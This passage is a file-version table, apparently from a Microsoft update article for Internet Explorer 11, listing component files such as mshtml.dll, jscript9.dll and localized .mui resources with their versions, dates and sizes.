\nF12Resources.dll.mui| 11.0.9600.17278| 15-Aug-2014| 20:19| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:00| 74,752 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 62,464 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 75,264 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 73,216 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 41,472 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 37,888 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 70,656 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 69,632 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 68,608 \nF12Resources.dll.mui| 11.0.9600.20139| 13-Sep-2021| 23:14| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 59,904 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 69,120 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 29,696 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 30,720 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:47| 77,824 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 276,480 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:08| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,640 \nurlmon.dll.mui| 11.0.9600.20139| 13-Sep-2021| 23:14| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:14| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:15| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:15| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:15| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 35,328 \nwininet.dll| 11.0.9600.20139| 13-Sep-2021| 20:59| 4,858,880 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 21:57| 54,784 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:16| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:39| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:38| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18666| 16-Apr-2017| 2:49| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:38| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:39| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:40| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:40| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 2:53| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:36| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:21| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:19| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 2:53| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:21| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:19| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:17| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:17| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:16| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:17| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:18| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:16| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20139| 13-Sep-2021| 23:15| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:18| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:13| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:14| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:13| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:13| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:16| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 75,776 \nieui.dll| 11.0.9600.20045| 4-Jun-2021| 22:15| 615,936 \niedkcs32.dll| 18.0.9600.20045| 4-Jun-2021| 21:45| 381,952 \ninstall.ins| Not versioned| 13-Sep-2021| 19:04| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:22| 616,104 \nieapfltr.dll| 11.0.9600.20139| 13-Sep-2021| 20:28| 800,768 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 18:41| 145,920 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 21:40| 33,280 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:47| 88,064 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.18895| 1-Jan-2018| 21:32| 666,624 \niedvtool.dll| 11.0.9600.20045| 5-Jun-2021| 0:16| 950,784 \nDiagnosticsHub_is.dll| 11.0.9600.19963| 12-Feb-2021| 19:21| 50,176 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:53| 491,008 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:40| 316,416 \nEscMigPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 19:01| 124,416 \nescUnattend.exe| 11.0.9600.19326| 25-Mar-2019| 22:54| 87,040 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 15-Aug-2014| 15:51| 11,892 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:00| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 15-Aug-2014| 20:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.20139| 13-Sep-2021| 23:14| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 3,584 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:51| 245,248 \nF12Resources.dll| 11.0.9600.17496| 21-Nov-2014| 19:00| 10,949,120 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:50| 372,224 \nF12.dll| 11.0.9600.20045| 4-Jun-2021| 21:50| 1,422,848 \nmsfeeds.dll| 11.0.9600.20139| 13-Sep-2021| 20:56| 809,472 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:54| 1,518 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 23:54| 1,574 \nmsfeedsbs.dll| 11.0.9600.19650| 11-Feb-2020| 5:16| 60,416 \nmsfeedssync.exe| 11.0.9600.17416| 30-Oct-2014| 22:08| 12,800 \nmshta.exe| 11.0.9600.17416| 30-Oct-2014| 22:12| 13,824 \nmshtmled.dll| 11.0.9600.20045| 4-Jun-2021| 21:55| 92,672 \nmshtml.dll| 11.0.9600.20139| 13-Sep-2021| 22:16| 25,760,256 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 3:30| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:41| 3,228 \nIEAdvpack.dll| 11.0.9600.17416| 30-Oct-2014| 21:54| 132,096 \nieetwcollector.exe| 11.0.9600.18895| 1-Jan-2018| 21:17| 116,224 \nieetwproxystub.dll| 11.0.9600.18895| 1-Jan-2018| 21:28| 48,640 \nieetwcollectorres.dll| 11.0.9600.16518| 6-Feb-2014| 3:30| 4,096 \nielowutil.exe| 11.0.9600.17416| 30-Oct-2014| 21:55| 222,720 \nieproxy.dll| 11.0.9600.20045| 4-Jun-2021| 21:13| 870,400 \nIEShims.dll| 11.0.9600.19650| 11-Feb-2020| 4:29| 387,072 \niexpress.exe| 11.0.9600.17416| 30-Oct-2014| 22:10| 167,424 \nwextract.exe| 11.0.9600.17416| 30-Oct-2014| 22:12| 143,872 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 18:08| 51,712 \nWindows Pop-up Blocked.wav| Not versioned| 23-Sep-2013| 20:25| 85,548 \nWindows Information Bar.wav| Not versioned| 23-Sep-2013| 20:25| 23,308 \nWindows Feed Discovered.wav| Not versioned| 23-Sep-2013| 20:25| 19,884 \nWindows Navigation Start.wav| Not versioned| 23-Sep-2013| 20:25| 11,340 \nbing.ico| Not versioned| 23-Sep-2013| 19:51| 5,430 \nieUnatt.exe| 11.0.9600.17416| 30-Oct-2014| 21:51| 144,384 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 13-Sep-2021| 22:44| 2,956 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:43| 591,872 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:44| 628,736 \nMemoryAnalyzer.dll| 11.0.9600.19963| 12-Feb-2021| 19:01| 1,862,656 \nMshtmlDac.dll| 11.0.9600.19846| 23-Sep-2020| 21:25| 88,064 \nnetworkinspection.dll| 11.0.9600.19963| 12-Feb-2021| 18:38| 1,217,024 \noccache.dll| 11.0.9600.17416| 30-Oct-2014| 21:19| 152,064 \ndesktop.ini| Not versioned| 18-Jun-2013| 7:43| 65 \nwebcheck.dll| 11.0.9600.20045| 4-Jun-2021| 21:44| 262,144 \ndesktop.ini| Not versioned| 18-Jun-2013| 7:44| 65 \npdm.dll| 12.0.41202.0| 30-Sep-2014| 16:01| 579,192 \nmsdbg2.dll| 12.0.41202.0| 30-Sep-2014| 16:01| 403,592 \npdmproxy100.dll| 12.0.41202.0| 30-Sep-2014| 16:01| 107,152 \nmsrating.dll| 11.0.9600.18895| 1-Jan-2018| 20:56| 199,680 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:32| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:32| 1,988 \niertutil.dll| 11.0.9600.20064| 14-Jun-2021| 21:56| 2,916,864 \nie4uinit.exe| 11.0.9600.19963| 12-Feb-2021| 18:28| 728,064 \niernonce.dll| 11.0.9600.17416| 30-Oct-2014| 21:56| 34,304 \niesetup.dll| 11.0.9600.17416| 30-Oct-2014| 22:06| 66,560 \nieuinit.inf| Not versioned| 12-Mar-2015| 18:58| 16,303 \ninseng.dll| 11.0.9600.19101| 18-Jul-2018| 21:03| 107,520 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 21:29| 111,616 \nTimeline.dll| 11.0.9600.19963| 12-Feb-2021| 18:45| 219,648 \nTimeline_is.dll| 11.0.9600.19963| 12-Feb-2021| 19:07| 172,032 \nTimeline.cpu.xml| Not versioned| 24-Jul-2014| 11:58| 3,197 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:43| 1,018,880 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 22:06| 237,568 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,066,432 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 23:22| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,071,040 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,082,816 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:18| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:15| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:16| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:18| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:11| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:10| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:10| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:12| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:10| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:11| 2,278,912 \nieframe.dll.mui| 11.0.9600.20139| 13-Sep-2021| 23:18| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:11| 2,060,288 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 1,890,304 \nieframe.dll| 11.0.9600.20139| 13-Sep-2021| 21:16| 15,507,456 \nieframe.ptxml| Not versioned| 5-Feb-2014| 21:41| 24,486 \nieinstal.exe| 11.0.9600.18639| 25-Mar-2017| 10:20| 492,032 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 526,294 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 499,654 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 552,337 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:01| 944,559 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:14| 457,561 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 543,946 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:01| 526,557 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 575,838 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:01| 570,737 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 548,119 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 639,271 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:57| 525,504 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 488,488 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 548,494 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 559,343 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 535,067 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 541,455 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:03| 804,470 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 503,909 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 521,583 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 420,082 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 436,651 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 436,651 \ninetres.admx| Not versioned| 8-Feb-2021| 20:02| 1,678,023 \ninetcomm.dll| 6.3.9600.20139| 13-Sep-2021| 21:04| 1,033,216 \nINETRES.dll| 6.3.9600.16384| 22-Aug-2013| 4:43| 84,480 \njscript9.dll| 11.0.9600.20139| 13-Sep-2021| 21:55| 5,508,096 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 19:03| 814,592 \njscript.dll| 5.8.9600.20139| 13-Sep-2021| 21:26| 785,408 \nvbscript.dll| 5.8.9600.20139| 13-Sep-2021| 21:36| 581,120 \niexplore.exe| 11.0.9600.19036| 24-May-2018| 22:24| 817,296 \nhtml.iec| 2019.0.0.18895| 1-Jan-2018| 20:51| 341,504 \nieui.dll| 11.0.9600.18895| 1-Jan-2018| 20:44| 476,160 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 128,512 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:24| 73,728 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:29| 415,744 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 280,064 \nmsfeeds.dll| 11.0.9600.20139| 13-Sep-2021| 20:40| 696,320 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:53| 1,518 \nmshta.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 12,800 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 76,800 \nmshtml.dll| 11.0.9600.20139| 13-Sep-2021| 21:34| 20,295,168 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 2:20| 2,724,864 \nwow64_Microsoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:43| 3,228 \nieetwproxystub.dll| 11.0.9600.17416| 30-Oct-2014| 20:23| 47,616 \nieUnatt.exe| 11.0.9600.17416| 30-Oct-2014| 20:12| 115,712 \noccache.dll| 11.0.9600.17416| 30-Oct-2014| 19:48| 130,048 \nwebcheck.dll| 11.0.9600.19963| 12-Feb-2021| 18:13| 230,400 \niernonce.dll| 11.0.9600.17416| 30-Oct-2014| 20:15| 30,720 \niesetup.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 62,464 \nieuinit.inf| Not versioned| 12-Mar-2015| 18:55| 16,303 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 90,624 \nieframe.dll| 11.0.9600.20139| 13-Sep-2021| 20:47| 13,882,880 \nie9props.propdesc| Not versioned| 23-Sep-2013| 19:34| 2,843 \nwow64_ieframe.ptxml| Not versioned| 5-Feb-2014| 21:43| 24,486 \njscript9.dll| 11.0.9600.20139| 13-Sep-2021| 20:50| 4,119,040 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 18:37| 620,032 \njscript.dll| 5.8.9600.20139| 13-Sep-2021| 21:01| 653,824 \nvbscript.dll| 5.8.9600.20139| 13-Sep-2021| 21:10| 498,176 \nactxprxy.dll| 6.3.9600.20045| 4-Jun-2021| 21:32| 1,049,600 \nhlink.dll| 6.3.9600.20120| 11-Sep-2021| 19:22| 100,352 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 58,368 \nurlmon.dll| 11.0.9600.20139| 13-Sep-2021| 20:23| 1,342,976 \nWininetPlugin.dll| 6.3.9600.17416| 30-Oct-2014| 20:12| 35,328 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 11:17| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.20139| 13-Sep-2021| 22:46| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:27| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 